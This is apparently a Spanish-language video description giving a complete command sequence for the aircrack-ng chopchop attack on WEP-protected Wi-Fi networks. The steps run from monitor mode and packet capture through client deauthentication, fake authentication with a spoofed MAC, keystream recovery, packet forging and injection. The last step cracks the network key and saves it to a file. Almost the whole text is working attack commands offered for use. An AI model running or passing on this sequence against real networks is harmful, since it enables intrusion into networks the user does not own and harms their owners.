aireplay-ng -4 (ataque chopchop) HD

06.07.2013
aireplay-ng -4 (ataque chopchop) usando wifiway 3.4 este ataque lo puedes hacer cuando no tengas un cliente conectado o cuando las datas avancen lento... ojo: no siempre funciona... :( #################################### comandos usados: airmon-ng airmon-ng start wlan0 (se activa el modo monitor) airodump-ng mon0 --encrypt wep airodump-ng mon0 --encrypt wep -c canal -w essid --bssid BSSID (eso crea essid-01.cap es el que usaremos con aircrack-ng) aireplay-ng mon0 -0 10 -a BSSID aireplay-ng mon0 -1 2 -a BSSID -h FAKESTATION (eso nos conecta como cliente falso, cambiando nuestra MAC) aireplay-ng mon0 -4 -h FAKESTATION (eso crea replay.cap y replay .xor ...si es que el ataque resulta...) tcpdump -s 0 -n -e -r replay.cap (eso es para ver la ip) packetforge-ng -a BSSID -c STATION/FAKESTATION -h FAKESTATION -k IP-1 -l IP-2 -w archivo.cap -y replay.xor -0 (eso es para crear un archivo que inyectaremos) aireplay-ng mon0 -2 -r archivo.cap -h FAKESTATION (eso inyecta el archivo creado) aircrack-ng essid-01.cap -l essid.txt (eso busca la clave y cuando la encuentra crea un archivo de texto con ella) eso seria todo XD ####################################

Похожие видео

Показать еще